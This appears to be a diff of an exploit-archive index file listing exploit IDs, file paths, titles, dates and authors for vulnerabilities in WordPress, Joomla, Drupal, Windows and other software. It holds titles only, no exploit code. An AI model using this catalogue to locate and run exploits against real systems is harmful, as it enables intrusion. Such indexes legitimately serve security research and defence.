-34975,platforms/php/webapps/34975.txt,"SEO Tools Plugin for WordPress 3.0 - 'file' Parameter Directory Traversal Vulnerability",2010-11-08,"John Leitch",php,webapps,0 -34976,platforms/php/webapps/34976.txt,"Vodpod Video Gallery 3.1.5 for WordPress 'vodpod_gallery_thumbs.php' Cross-Site Scripting Vulnerability",2010-11-08,"John Leitch",php,webapps,0 -34977,platforms/php/webapps/34977.txt,"WordPress jRSS Widget Plugin 1.1.1 - 'url' Parameter Information Disclosure Vulnerability",2010-11-08,"John Leitch",php,webapps,0 -34978,platforms/windows/remote/34978.c,"Silo 2.1.1 - 'wintab32.dll' DLL Loading Arbitrary Code Execution Vulnerability",2010-11-08,"Gjoko Krstic",windows,remote,0 -34979,platforms/php/remote/34979.php,"PHP 5.3.x - 'mb_strcut()' Function Information Disclosure Vulnerability",2010-11-07,"Mateusz Kocielski",php,remote,0 -34980,platforms/novell/dos/34980.py,"Novell GroupWise 8.0 - Multiple Remote Vulnerabilities",2010-11-08,"Francis Provencher",novell,dos,0 -34981,platforms/ios/webapps/34981.txt,"Indeed Job Search 2.5 iOS API - Multiple Vulnerabilities",2014-10-15,Vulnerability-Lab,ios,webapps,0 34982,platforms/win32/local/34982.rb,"Microsoft Bluetooth Personal Area Networking (BthPan.sys) Privilege Escalation",2014-10-15,metasploit,win32,local,0 +34994,platforms/cgi/webapps/34994.txt,"OpenWrt 10.03 - Multiple Cross-Site Scripting Vulnerabilities",2010-11-13,"dave b",cgi,webapps,0 +34995,platforms/php/webapps/34995.txt,"Simea CMS 'index.php' SQL Injection Vulnerability",2010-11-16,Cru3l.b0y,php,webapps,0 34984,platforms/php/webapps/34984.py,"Drupal Core <= 7.32 - SQL Injection (#1)",2014-10-16,fyukyuk,php,webapps,0 34985,platforms/php/remote/34985.txt,"pfSense 2 Beta 4 - 'graph.php' Multiple Cross-Site Scripting Vulnerabilities",2010-11-05,"dave b",php,remote,0 34986,platforms/hardware/remote/34986.txt,"D-Link DIR-300 - Multiple Security Bypass Vulnerabilities",2010-11-09,"Karol Celia",hardware,remote,0 @@ -31515,11 +31523,9 @@ id,file,description,date,author,platform,type,port 34988,platforms/php/webapps/34988.txt,"PHPShop 2.1 EE 'name_new' Parameter Cross-Site Scripting Vulnerability",2010-11-10,MustLive,php,webapps,0 34989,platforms/php/webapps/34989.txt,"WeBid 0.85P1 - Multiple Input Validation Vulnerabilities",2010-11-10,"John Leitch",php,webapps,0 34990,platforms/php/webapps/34990.txt,"Ricoh Web Image Monitor 2.03 - Cross-Site Scripting Vulnerability",2010-11-09,thelightcosine,php,webapps,0 -34992,platforms/php/webapps/34992.txt,"Drupal Core <= 7.32 - SQL Injection (#2)",2014-10-17,"Claudio Viviani",php,webapps,0 -34993,platforms/php/webapps/34993.php,"Drupal Core <= 7.32 - SQL Injection (PHP)",2014-10-17,"Dustin Drr",php,webapps,0 -34994,platforms/cgi/webapps/34994.txt,"OpenWrt 10.03 - Multiple Cross-Site Scripting Vulnerabilities",2010-11-13,"dave b",cgi,webapps,0 -34995,platforms/php/webapps/34995.txt,"Simea CMS 'index.php' SQL Injection Vulnerability",2010-11-16,Cru3l.b0y,php,webapps,0 34996,platforms/php/webapps/34996.txt,"Raised Eyebrow CMS 'venue.php' SQL Injection Vulnerability",2010-11-16,Cru3l.b0y,php,webapps,0 +34992,platforms/php/webapps/34992.txt,"Drupal Core <= 7.32 - SQL Injection (#2)",2014-10-17,"Claudio Viviani",php,webapps,0 +34993,platforms/php/webapps/34993.php,"Drupal Core <= 7.32 - SQL Injection (PHP)",2014-10-17,"Dustin Dörr",php,webapps,0 34997,platforms/windows/remote/34997.txt,"DServe Multiple Cross-Site Scripting Vulnerabilities",2010-11-16,Axiell,windows,remote,0 34998,platforms/linux/remote/34998.txt,"Eclipse <= 3.6.1 Help Server help/index.jsp URI XSS",2010-11-16,"Aung Khant",linux,remote,0 34999,platforms/linux/remote/34999.txt,"Eclipse <= 3.6.1 Help Server help/advanced/content.jsp URI XSS",2010-11-16,"Aung Khant",linux,remote,0 @@ -31536,7 +31542,6 @@ id,file,description,date,author,platform,type,port 35010,platforms/osx/local/35010.c,"Apple iOS <= 4.0.2 Networking Packet Filter Rules Local Privilege Escalation Vulnerability",2010-11-22,Apple,osx,local,0 35011,platforms/linux/remote/35011.txt,"Apache Tomcat <= 7.0.4 - 'sort' and 'orderBy' Parameters Cross-Site Scripting Vulnerabilities",2010-11-22,"Adam Muntner",linux,remote,0 35012,platforms/multiple/webapps/35012.txt,"ZyXEL P-660R-T1 V2 - 'HomeCurrent_Date' Parameter Cross-Site Scripting Vulnerability",2010-11-23,"Usman Saeed",multiple,webapps,0 -35013,platforms/linux/dos/35013.c,"Linux Kernel 2.6.x - 'inotify_init()' Memory Leak Local Denial of Service Vulnerability",2010-11-24,"Vegard Nossum",linux,dos,0 35014,platforms/hardware/remote/35014.txt,"D-Link DIR-300 WiFi Key Security Bypass Vulnerability",2010-11-24,"Gaurav Saha",hardware,remote,0 35015,platforms/cgi/webapps/35015.txt,"SimpLISTic SQL 2.0 - 'email.cgi' Cross-Site Scripting Vulnerability",2010-11-24,"Aliaksandr Hartsuyeu",cgi,webapps,0 35016,platforms/php/webapps/35016.txt,"Easy Banner 2009.05.18 member.php Multiple Parameter SQL Injection Authentication Bypass",2010-11-26,"Aliaksandr Hartsuyeu",php,webapps,0 @@ -31545,15 +31550,12 @@ id,file,description,date,author,platform,type,port 35019,platforms/windows/local/35019.py,"Windows OLE Package Manager SandWorm Exploit",2014-10-20,"Vlad Ovtchinikov",windows,local,0 35020,platforms/win32/local/35020.rb,"MS14-060 Microsoft Windows OLE Package Manager Code Execution",2014-10-20,metasploit,win32,local,0 35021,platforms/linux/local/35021.rb,"Linux PolicyKit Race Condition Privilege Escalation",2014-10-20,metasploit,linux,local,0 -35022,platforms/php/webapps/35022.txt,"4homepages 4images 1.7.x - 'categories.php' Parameter SQL Injection Vulnerability",2010-11-29,"Ahmed Atif",php,webapps,0 -35023,platforms/php/webapps/35023.txt,"Wernhart Guestbook 2001.03.28 - Multiple SQL Injection Vulnerabilities",2010-11-29,"Aliaksandr Hartsuyeu",php,webapps,0 -35024,platforms/php/webapps/35024.txt,"Joomla Catalogue Component SQL Injection and Local File Include Vulnerabilities",2010-11-30,XroGuE,php,webapps,0 35025,platforms/php/webapps/35025.html,"Car Portal 2.0 - 'car_make' Parameter Cross-Site Scripting Vulnerability",2010-11-29,"Underground Stockholm",php,webapps,0 35026,platforms/php/webapps/35026.txt,"Joomla Store Directory 'id' Parameter SQL Injection Vulnerability",2010-11-30,XroGuE,php,webapps,0 35027,platforms/php/webapps/35027.txt,"E-lokaler CMS 2 Admin Login Multiple SQL Injection Vulnerabilities",2010-11-26,ali_err0r,php,webapps,0 35028,platforms/php/webapps/35028.txt,"SmartBox - 'page_id' Parameter SQL Injection Vulnerability",2010-11-26,KnocKout,php,webapps,0 -35031,platforms/asp/webapps/35031.txt,"BugTracker.NET 3.4.4 SQL Injection and Cross-Site Scripting Vulnerabilities",2010-11-30,BugTracker.NET,asp,webapps,0 35032,platforms/windows/remote/35032.rb,"Numara / BMC Track-It! FileStorageService Arbitrary File Upload",2014-10-21,metasploit,windows,remote,0 +35031,platforms/asp/webapps/35031.txt,"BugTracker.NET 3.4.4 SQL Injection and Cross-Site Scripting Vulnerabilities",2010-11-30,BugTracker.NET,asp,webapps,0 35033,platforms/php/remote/35033.rb,"Joomla Akeeba Kickstart Unserialize Remote Code Execution",2014-10-21,metasploit,php,remote,80 35034,platforms/multiple/remote/35034.rb,"HP Data Protector EXEC_INTEGUTIL Remote Code Execution",2014-10-21,metasploit,multiple,remote,5555 35035,platforms/cgi/webapps/35035.txt,"Awstats 6.x Apache Tomcat Configuration File Remote Arbitrary Command Execution Vulnerability",2010-11-30,StenoPlasma,cgi,webapps,0 @@ -31574,11 +31576,13 @@ id,file,description,date,author,platform,type,port 35050,platforms/php/webapps/35050.txt,"Alguest 1.1 - 'start' Parameter SQL Injection Vulnerability",2010-12-06,"Aliaksandr Hartsuyeu",php,webapps,0 35051,platforms/windows/remote/35051.txt,"Freefloat FTP Server Directory Traversal Vulnerability",2010-12-06,Pr0T3cT10n,windows,remote,0 35052,platforms/php/webapps/35052.txt,"Magento Server MAGMI Plugin - Remote File Inclusion (RFI)",2014-10-25,"Parvinder Bhasin",php,webapps,0 +35566,platforms/php/webapps/35566.txt,"Yaws-Wiki 1.88-1 - Multiple Cross-Site Scripting and HTML Injection Vulnerabilities",2011-04-04,"Michael Brooks",php,webapps,0 35055,platforms/windows/remote/35055.py,"Windows OLE - Remote Code Execution ""Sandworm"" Exploit (MS14-060)",2014-10-25,"Mike Czumak",windows,remote,0 35056,platforms/hardware/webapps/35056.txt,"Dell EqualLogic Storage - Directory Traversal",2014-10-25,"Mauricio Correa",hardware,webapps,0 35057,platforms/php/webapps/35057.py,"Creative Contact Form (Wordpress 0.9.7 and Joomla 2.0.0) - Shell Upload Vulnerability",2014-10-25,"Claudio Viviani",php,webapps,0 35058,platforms/bsd/dos/35058.c,"OpenBSD <= 5.5 - Local Kernel Panic",2014-10-25,nitr0us,bsd,dos,0 35059,platforms/ios/webapps/35059.txt,"File Manager 4.2.10 iOS - Code Execution Vulnerability",2014-10-25,Vulnerability-Lab,ios,webapps,0 +35127,platforms/jsp/webapps/35127.txt,"Progress OpenEdge 11.2 - Directory Traversal",2014-10-31,"Mauricio Correa",jsp,webapps,9090 35060,platforms/php/webapps/35060.txt,"Aigaion 1.3.4 - 'ID' Parameter SQL Injection Vulnerability",2010-12-07,KnocKout,php,webapps,0 35061,platforms/linux/dos/35061.c,"GNU glibc 'regcomp()' Stack Exhaustion Denial Of Service Vulnerability",2010-12-07,"Maksymilian Arciemowicz",linux,dos,0 35062,platforms/multiple/remote/35062.txt,"RDM Embedded Lock Manager < 9.x - 'lm_tcp' Service Buffer Overflow Vulnerability",2010-12-07,"Luigi Auriemma",multiple,remote,0 @@ -31622,8 +31626,10 @@ id,file,description,date,author,platform,type,port 35100,platforms/php/webapps/35100.txt,"Enalean Tuleap 7.4.99.5 - Remote Command Execution",2014-10-28,Portcullis,php,webapps,80 35101,platforms/windows/local/35101.rb,"Windows TrackPopupMenu Win32k NULL Pointer Dereference",2014-10-28,metasploit,windows,local,0 35102,platforms/php/webapps/35102.py,"vBulletin Tapatalk - Blind SQL Injection",2014-10-28,tintinweb,php,webapps,80 +35214,platforms/multiple/webapps/35214.txt,"Subex Fms 7.4 - Unauthenticated SQLi",2014-11-11,"Anastasios Monachos",multiple,webapps,0 35103,platforms/hardware/remote/35103.txt,"Konke Smart Plug K - Authentication Bypass Vulnerability",2014-10-29,gamehacker,hardware,remote,0 35105,platforms/windows/dos/35105.pl,"Mini-stream RM-MP3 Converter 3.1.2.1.2010.03.30 - (.wax) Buffer Overflow/DoS EIP Overwrite",2014-10-29,"ZoRLu Bugrahan",windows,dos,0 +35209,platforms/jsp/webapps/35209.txt,"ManageEngine OpManager_ Social IT Plus and IT360 - Multiple Vulnerabilities",2014-11-10,"Pedro Ribeiro",jsp,webapps,0 35106,platforms/php/webapps/35106.txt,"Cetera eCommerce 'banner.php' Cross-Site Scripting Vulnerability",2010-12-11,MustLive,php,webapps,0 35107,platforms/cfm/webapps/35107.txt,"Mura CMS - Multiple Cross-Site Scripting Vulnerabilities",2010-12-13,"Richard Brain",cfm,webapps,0 35108,platforms/php/webapps/35108.txt,"MyBB <= 1.4.10 - 'tags.php' Cross-Site Scripting Vulnerability",2010-12-12,TEAMELITE,php,webapps,0 @@ -31645,7 +31651,6 @@ id,file,description,date,author,platform,type,port 35124,platforms/php/webapps/35124.txt,"FreeNAS 0.7.2.5543 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2010-12-21,db.pub.mail,php,webapps,0 35125,platforms/php/webapps/35125.txt,"Openfiler 'device' Parameter Cross-Site Scripting Vulnerability",2010-12-21,db.pub.mail,php,webapps,0 35126,platforms/php/webapps/35126.txt,"Habari 0.6.5 - Multiple Cross-Site Scripting Vulnerabilities",2010-12-21,"High-Tech Bridge SA",php,webapps,0 -35127,platforms/jsp/webapps/35127.txt,"Progress OpenEdge 11.2 - Directory Traversal",2014-10-31,"Mauricio Correa",jsp,webapps,9090 35128,platforms/hardware/webapps/35128.txt,"ZTE Modem ZXDSL 531BIIV7.3.0f_D09_IN - Stored XSS Vulnerability",2014-10-31,"Ravi Rajput",hardware,webapps,0 35129,platforms/php/webapps/35129.txt,"Who's Who Script - CSRF Exploit (Add Admin Account)",2014-10-31,"ZoRLu Bugrahan",php,webapps,0 35130,platforms/windows/remote/35130.txt,"Calibre 0.7.34 - Cross-Site Scripting and Directory Traversal Vulnerabilities",2010-12-21,waraxe,windows,remote,0 @@ -31657,6 +31662,7 @@ id,file,description,date,author,platform,type,port 35136,platforms/php/webapps/35136.txt,"WordPress Accept Signups Plugin 0.1 - 'email' Parameter Cross-Site Scripting Vulnerability",2010-12-22,clshack,php,webapps,0 35137,platforms/php/webapps/35137.txt,"Social Share 'vote.php' HTTP Response Splitting Vulnerability",2010-12-10,"Aliaksandr Hartsuyeu",php,webapps,0 35138,platforms/php/webapps/35138.txt,"Esotalk CMS 1.0.0g4 - XSS Vulnerability",2014-11-02,evi1m0,php,webapps,0 +35212,platforms/php/webapps/35212.txt,"XCloner Wordpress/Joomla! Plugin - Multiple Vulnerabilities",2014-11-10,"Larry W. Cashdollar",php,webapps,80 35140,platforms/php/webapps/35140.txt,"MyBB 1.6 - search.php keywords Parameter SQL Injection",2010-12-23,"Aung Khant",php,webapps,0 35141,platforms/php/webapps/35141.txt,"MyBB 1.6 private.php keywords Parameter SQL Injection",2010-12-23,"Aung Khant",php,webapps,0 35142,platforms/php/webapps/35142.txt,"Social Share 'search' Parameter Cross-Site Scripting Vulnerability",2010-12-23,"Aliaksandr Hartsuyeu",php,webapps,0 @@ -31674,7 +31680,7 @@ id,file,description,date,author,platform,type,port 35156,platforms/php/webapps/35156.txt,"Coppermine Photo Gallery 1.5.10 help.php Multiple Parameter XSS",2010-12-28,waraxe,php,webapps,0 35157,platforms/php/webapps/35157.html,"Coppermine Photo Gallery 1.5.10 - searchnew.php picfile_* Parameter XSS",2010-12-28,waraxe,php,webapps,0 35158,platforms/windows/dos/35158.py,"Mongoose 2.11 - 'Content-Length' HTTP Header Remote Denial Of Service Vulnerability",2010-12-27,JohnLeitch,windows,dos,0 -35159,platforms/php/webapps/35159.txt,"Modx CMS 2.2.14 - CSRF Bypass, Reflected XSS, Stored XSS Vulnerability",2014-11-05,"Narendra Bhati",php,webapps,0 +35159,platforms/php/webapps/35159.txt,"Modx CMS 2.2.14 - CSRF Bypass & Reflected XSS & Stored XSS Vulnerability",2014-11-05,"Narendra Bhati",php,webapps,0 35160,platforms/php/webapps/35160.txt,"Mouse Media Script 1.6 - - Stored XSS Vulnerability",2014-11-05,"Halil Dalabasmaz",php,webapps,0 35161,platforms/linux/local/35161.txt,"Linux Kernel <= 2.6.39 (32-bit & 64-bit) - Mempodipper Local Root (#2)",2012-01-12,zx2c4,linux,local,0 35162,platforms/linux/dos/35162.cob,"GIMP <= 2.6.7 - Multiple File Plugins Remote Stack Buffer Overflow Vulnerabilities",2010-12-31,"non customers",linux,dos,0 @@ -31704,26 +31710,30 @@ id,file,description,date,author,platform,type,port 35189,platforms/windows/local/35189.c,"SafeGuard PrivateDisk 2.0/2.3 - 'privatediskm.sys' Multiple Local Security Bypass Vulnerabilities",2008-03-05,mu-b,windows,local,0 35190,platforms/windows/remote/35190.html,"Newv SmartClient 1.1.0 - 'NewvCommon.ocx' ActiveX Control Multiple Vulnerabilities",2011-01-10,wsn1983,windows,remote,0 35191,platforms/php/webapps/35191.txt,"CMS Tovar 'tovar.php' SQL Injection Vulnerability",2011-01-11,jos_ali_joe,php,webapps,0 +35211,platforms/java/remote/35211.rb,"Visual Mining NetCharts Server Remote Code Execution",2014-11-10,metasploit,java,remote,8001 35193,platforms/php/webapps/35193.txt,"vldPersonals 2.7 - Multiple Vulnerabilities",2014-11-10,"Mr T",php,webapps,0 35197,platforms/php/webapps/35197.txt,"Serenity Client Management Portal 1.0.1 - Multiple Vulnerabilities",2014-11-10,"Halil Dalabasmaz",php,webapps,0 35198,platforms/php/webapps/35198.txt,"phpSound Music Sharing Platform 1.0.5 - Multiple XSS Vulnerabilities",2014-11-10,"Halil Dalabasmaz",php,webapps,0 +35210,platforms/multiple/webapps/35210.txt,"Password Manager Pro / Pro MSP - Blind SQL Injection",2014-11-10,"Pedro Ribeiro",multiple,webapps,0 35202,platforms/windows/dos/35202.py,"Internet Explorer 11 - Denial Of Service",2014-11-10,"Behrooz Abbassi",windows,dos,0 35203,platforms/hardware/webapps/35203.txt,"ZTE ZXDSL 831CII - Insecure Direct Object Reference",2014-11-10,"Paulos Yibelo",hardware,webapps,0 +35205,platforms/linux/shellcode/35205.txt,"Position independent & Alphanumeric 64-bit execve(""/bin/sh\0""_NULL_NULL); (87 bytes)",2014-11-10,Breaking.Technology,linux,shellcode,0 35204,platforms/php/webapps/35204.txt,"Another Wordpress Classifieds Plugin - SQL Injection",2014-11-10,dill,php,webapps,0 -35205,platforms/linux/shellcode/35205.txt,"Position independent & Alphanumeric 64-bit execve(""/bin/sh\0"",NULL,NULL); (87 bytes)",2014-11-10,Breaking.Technology,linux,shellcode,0 35206,platforms/php/webapps/35206.txt,"PHP-Fusion 7.02.07 - SQL Injection",2014-11-10,"Mauricio Correa",php,webapps,0 +35313,platforms/php/webapps/35313.txt,"Wordpress SP Client Document Manager Plugin 2.4.1 - SQL Injection",2014-11-21,"ITAS Team",php,webapps,80 35208,platforms/hardware/webapps/35208.txt,"Barracuda - Multiple Anauthentificated Logfile Download",2014-11-10,4CKnowLedge,hardware,webapps,0 -35209,platforms/jsp/webapps/35209.txt,"ManageEngine OpManager, Social IT Plus and IT360 - Multiple Vulnerabilities",2014-11-10,"Pedro Ribeiro",jsp,webapps,0 -35210,platforms/multiple/webapps/35210.txt,"Password Manager Pro / Pro MSP - Blind SQL Injection",2014-11-10,"Pedro Ribeiro",multiple,webapps,0 -35211,platforms/java/remote/35211.rb,"Visual Mining NetCharts Server Remote Code Execution",2014-11-10,metasploit,java,remote,8001 -35212,platforms/php/webapps/35212.txt,"XCloner Wordpress/Joomla! Plugin - Multiple Vulnerabilities",2014-11-10,"Larry W. Cashdollar",php,webapps,80 -35214,platforms/multiple/webapps/35214.txt,"Subex Fms 7.4 - Unauthenticated SQLi",2014-11-11,"Anastasios Monachos",multiple,webapps,0 +35292,platforms/php/webapps/35292.html,"vBSEO 3.2.2/3.5.2 - Multiple Cross-Site Scripting Vulnerabilities",2011-01-30,MaXe,php,webapps,0 +35291,platforms/php/webapps/35291.txt,"Vanilla Forums 2.0.16 - 'Target' Parameter Cross-Site Scripting Vulnerability",2011-01-27,"YGN Ethical Hacker Group",php,webapps,0 +35295,platforms/php/webapps/35295.txt,"Joomla Component - 'com_frontenduseraccess' Local File Include Vulnerability",2011-02-01,wishnusakti,php,webapps,0 +35296,platforms/php/webapps/35296.txt,"eSyndiCat Directory Software 2.2/2.3 - 'preview' Parameter Cross-Site Scripting Vulnerability",2011-01-30,"Avram Marius",php,webapps,0 +35297,platforms/php/webapps/35297.txt,"Moodle 2.0.1 - 'PHPCOVERAGE_HOME' Cross-Site Scripting Vulnerability",2011-02-01,"AutoSec Tools",php,webapps,0 +35298,platforms/php/webapps/35298.txt,"TinyWebGallery 1.8.3 - Cross-Site Scripting and Local File Include Vulnerabilities",2011-02-01,"Yam Mesicka",php,webapps,0 +35221,platforms/php/webapps/35221.txt,"Piwigo 2.6.0 - (picture.php rate param) SQL Injection",2014-11-13,"Manuel García Cárdenas",php,webapps,80 35216,platforms/windows/local/35216.py,"Microsoft Office 2007 and 2010 - OLE Arbitrary Command Execution",2014-11-12,"Abhishek Lyall",windows,local,0 35217,platforms/windows/dos/35217.txt,"CorelDRAW X7 CDR File (CdrTxt.dll) Off-By-One Stack Corruption Vulnerability",2014-11-12,LiquidWorm,windows,dos,0 35218,platforms/php/webapps/35218.txt,"WordPress SupportEzzy Ticket System Plugin 1.2.5 - Stored XSS Vulnerability",2014-11-12,"Halil Dalabasmaz",php,webapps,80 35219,platforms/multiple/webapps/35219.txt,"Proticaret E-Commerce Script 3.0 - SQL Injection",2014-11-13,"Onur Alanbel (BGA)",multiple,webapps,0 35220,platforms/multiple/webapps/35220.txt,"Joomla HD FLV Player < 2.1.0.1 - SQL Injection Vulnerability",2014-11-13,"Claudio Viviani",multiple,webapps,0 -35221,platforms/php/webapps/35221.txt,"Piwigo 2.6.0 - (picture.php, rate param) SQL Injection",2014-11-13,"Manuel Garca Crdenas",php,webapps,80 35222,platforms/jsp/webapps/35222.txt,"F5 BIG-IP 10.1.0 - Directory Traversal Vulnerability",2014-11-13,"Anastasios Monachos",jsp,webapps,0 35223,platforms/php/webapps/35223.txt,"Digi Online Examination System 2.0 - Unrestricted File Upload",2014-11-13,"Halil Dalabasmaz",php,webapps,80 35224,platforms/php/webapps/35224.txt,"MyBB 1.8.X - Multiple Vulnerabilities",2014-11-13,smash,php,webapps,80 @@ -31750,11 +31760,16 @@ id,file,description,date,author,platform,type,port 35245,platforms/php/webapps/35245.txt,"PHPAuctions 'viewfaqs.php' SQL Injection Vulnerability",2011-01-19,"BorN To K!LL",php,webapps,0 35246,platforms/php/webapps/35246.py,"Joomla HD FLV Player < 2.1.0.1 - Arbitrary File Download Vulnerability",2014-11-15,"Claudio Viviani",php,webapps,0 35248,platforms/multiple/webapps/35248.txt,"clientResponse Client Management 4.1 - XSS Vulnerability",2014-11-15,"Halil Dalabasmaz",multiple,webapps,0 +35293,platforms/php/webapps/35293.txt,"VirtueMart eCommerce Component 1.1.6 for Joomla! SQL Injection Vulnerability",2011-01-31,"Andrea Fabrizi",php,webapps,0 +35288,platforms/php/webapps/35288.txt,"WordPress oQey-Gallery Plugin 0.2 - 'tbpv_domain' Parameter Cross-Site Scripting Vulnerability",2011-01-24,"AutoSec Tools",php,webapps,0 +35289,platforms/php/webapps/35289.txt,"WordPress FCChat Widget Plugin 2.1.7 - 'path' Parameter Cross-Site Scripting Vulnerability",2011-01-25,"AutoSec Tools",php,webapps,0 +35290,platforms/php/webapps/35290.txt,"SimpGB 1.49.2 - 'guestbook.php' Multiple Cross-Site Scripting Vulnerabilities",2011-01-26,MustLive,php,webapps,0 35251,platforms/php/webapps/35251.txt,"Pixie CMS 1.0.4 - 'admin/index.php' SQL Injection Vulnerability",2011-01-20,"High-Tech Bridge SA",php,webapps,0 35252,platforms/multiple/remote/35252.php,"libxml2 2.6.x - 'XMLWriter::writeAttribute()' Memory Leak Information Disclosure Vulnerability",2011-01-24,"Kees Cook",multiple,remote,0 35253,platforms/php/webapps/35253.txt,"web@all 1.1 - 'url' Parameter Cross-Site Scripting Vulnerability",2011-01-25,"AutoSec Tools",php,webapps,0 35254,platforms/php/webapps/35254.txt,"PivotX 2.2.2 - 'module_image.php' Cross-Site Scripting Vulnerability",2011-01-25,"AutoSec Tools",php,webapps,0 35255,platforms/php/webapps/35255.txt,"WordPress Uploader Plugin 1.0 - 'num' Parameter Cross-Site Scripting Vulnerability",2011-01-24,"AutoSec Tools",php,webapps,0 +35273,platforms/windows/remote/35273.html,"Internet Explorer 8 - Fixed Col Span ID Full ASLR_ DEP & EMET 5.1 Bypass (MS12-037)",2014-11-17,"ryujin & sickness",windows,remote,0 35256,platforms/cfm/webapps/35256.txt,"ActiveWeb Professional 3.0 - Arbitrary File Upload Vulnerability",2011-01-25,StenoPlasma,cfm,webapps,0 35257,platforms/php/webapps/35257.txt,"WordPress Videox7 UGC Plugin 2.5.3.2 - 'listid' Parameter Cross-Site Scripting Vulnerability",2011-01-25,"AutoSec Tools",php,webapps,0 35258,platforms/php/webapps/35258.txt,"WordPress Audio Plugin 0.5.1 - 'showfile' Parameter Cross-Site Scripting Vulnerability",2011-01-23,"AutoSec Tools",php,webapps,0 @@ -31766,33 +31781,22 @@ id,file,description,date,author,platform,type,port 35264,platforms/php/webapps/35264.txt,"WordPress Featured Content Plugin 0.0.1 - 'listid' Parameter Cross-Site Scripting Vulnerability",2011-01-25,"AutoSec Tools",php,webapps,0 35265,platforms/php/webapps/35265.php,"WordPress Recip.ly 1.1.7 - 'uploadImage.php' Arbitrary File Upload Vulnerability",2011-01-25,"AutoSec Tools",php,webapps,0 35266,platforms/php/webapps/35266.txt,"MyBB Forums 1.8.2 - Stored XSS Vulnerability",2014-11-17,"Avinash Thapa",php,webapps,0 -35271,platforms/php/webapps/35271.txt,"Maarch LetterBox 2.8 - Insecure Cookies (Login Bypass)",2014-11-17,"ZoRLu Bugrahan",php,webapps,0 35272,platforms/hardware/webapps/35272.txt,"ZTE ZXHN H108L - Authentication Bypass",2014-11-17,"Project Zero Labs",hardware,webapps,0 -35273,platforms/windows/remote/35273.html,"Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.1 Bypass (MS12-037)",2014-11-17,"ryujin & sickness",windows,remote,0 -35274,platforms/php/webapps/35274.txt,"PHPFox - Stored XSS Vulnerability",2014-11-17,spyk2r,php,webapps,80 -35275,platforms/xml/webapps/35275.txt,"Proticaret E-Commerce Script 3.0 - SQL Injection",2014-11-17,"BGA Security",xml,webapps,80 -35276,platforms/hardware/webapps/35276.txt,"ZTE ZXHN H108L - Authentication Bypass",2014-11-17,"Project Zero Labs",hardware,webapps,80 -35277,platforms/php/webapps/35277.txt,"WebsiteBaker 2.8.3 - Multiple Vulnerabilities",2014-11-17,"Manuel Garca Crdenas",php,webapps,80 -35278,platforms/php/webapps/35278.txt,"Zoph 0.9.1 - Multiple Vulnerabilities",2014-11-17,"Manuel Garca Crdenas",php,webapps,80 -35279,platforms/osx/dos/35279.html,"Safari 8.0 / OS X 10.10 - Crash PoC",2014-11-17,w3bd3vil,osx,dos,0 -35280,platforms/windows/remote/35280.txt,".NET Remoting Services Remote Command Execution",2014-11-17,"James Forshaw",windows,remote,0 -35282,platforms/android/remote/35282.rb,"Samsung Galaxy KNOX Android Browser RCE",2014-11-18,metasploit,android,remote,0 -35283,platforms/php/remote/35283.rb,"MantisBT XmlImportExport Plugin PHP Code Injection Vulnerability",2014-11-18,metasploit,php,remote,80 +35271,platforms/php/webapps/35271.txt,"Maarch LetterBox 2.8 - Insecure Cookies (Login Bypass)",2014-11-17,"ZoRLu Bugrahan",php,webapps,0 35284,platforms/multiple/remote/35284.pl,"Opera Web Browser 11.00 - 'option' HTML Element Integer Overflow Vulnerability",2011-01-25,"C4SS!0 G0M3S",multiple,remote,0 35285,platforms/php/webapps/35285.txt,"WordPress Feature Slideshow Plugin 1.0.6 \'src\' Parameter Cross-Site Scripting Vulnerability",2011-01-24,"AutoSec Tools",php,webapps,0 35286,platforms/php/webapps/35286.txt,"WordPress BezahlCode Generator Plugin 1.0 - 'gen_name' Parameter Cross-Site Scripting Vulnerability",2011-01-25,"AutoSec Tools",php,webapps,0 35287,platforms/php/webapps/35287.txt,"Powerhouse Museum Collection Image Grid 0.9.1.1 - 'tbpv_username' Parameter Cross-Site Scripting Vulnerability",2011-01-24,"AutoSec Tools",php,webapps,0 -35288,platforms/php/webapps/35288.txt,"WordPress oQey-Gallery Plugin 0.2 - 'tbpv_domain' Parameter Cross-Site Scripting Vulnerability",2011-01-24,"AutoSec Tools",php,webapps,0 -35289,platforms/php/webapps/35289.txt,"WordPress FCChat Widget Plugin 2.1.7 - 'path' Parameter Cross-Site Scripting Vulnerability",2011-01-25,"AutoSec Tools",php,webapps,0 -35290,platforms/php/webapps/35290.txt,"SimpGB 1.49.2 - 'guestbook.php' Multiple Cross-Site Scripting Vulnerabilities",2011-01-26,MustLive,php,webapps,0 -35291,platforms/php/webapps/35291.txt,"Vanilla Forums 2.0.16 - 'Target' Parameter Cross-Site Scripting Vulnerability",2011-01-27,"YGN Ethical Hacker Group",php,webapps,0 -35292,platforms/php/webapps/35292.html,"vBSEO 3.2.2/3.5.2 - Multiple Cross-Site Scripting Vulnerabilities",2011-01-30,MaXe,php,webapps,0 -35293,platforms/php/webapps/35293.txt,"VirtueMart eCommerce Component 1.1.6 for Joomla! SQL Injection Vulnerability",2011-01-31,"Andrea Fabrizi",php,webapps,0 +35274,platforms/php/webapps/35274.txt,"PHPFox - Stored XSS Vulnerability",2014-11-17,spyk2r,php,webapps,80 +35275,platforms/xml/webapps/35275.txt,"Proticaret E-Commerce Script 3.0 - SQL Injection",2014-11-17,"BGA Security",xml,webapps,80 +35276,platforms/hardware/webapps/35276.txt,"ZTE ZXHN H108L - Authentication Bypass",2014-11-17,"Project Zero Labs",hardware,webapps,80 +35277,platforms/php/webapps/35277.txt,"WebsiteBaker 2.8.3 - Multiple Vulnerabilities",2014-11-17,"Manuel García Cárdenas",php,webapps,80 +35278,platforms/php/webapps/35278.txt,"Zoph 0.9.1 - Multiple Vulnerabilities",2014-11-17,"Manuel García Cárdenas",php,webapps,80 +35279,platforms/osx/dos/35279.html,"Safari 8.0 / OS X 10.10 - Crash PoC",2014-11-17,w3bd3vil,osx,dos,0 +35280,platforms/windows/remote/35280.txt,".NET Remoting Services - Remote Command Execution",2014-11-17,"James Forshaw",windows,remote,0 35294,platforms/php/webapps/35294.txt,"Joomla! 'com_clan_members' Component - 'id' Parameter SQL Injection Vulnerability",2011-02-01,FL0RiX,php,webapps,0 -35295,platforms/php/webapps/35295.txt,"Joomla Component - 'com_frontenduseraccess' Local File Include Vulnerability",2011-02-01,wishnusakti,php,webapps,0 -35296,platforms/php/webapps/35296.txt,"eSyndiCat Directory Software 2.2/2.3 - 'preview' Parameter Cross-Site Scripting Vulnerability",2011-01-30,"Avram Marius",php,webapps,0 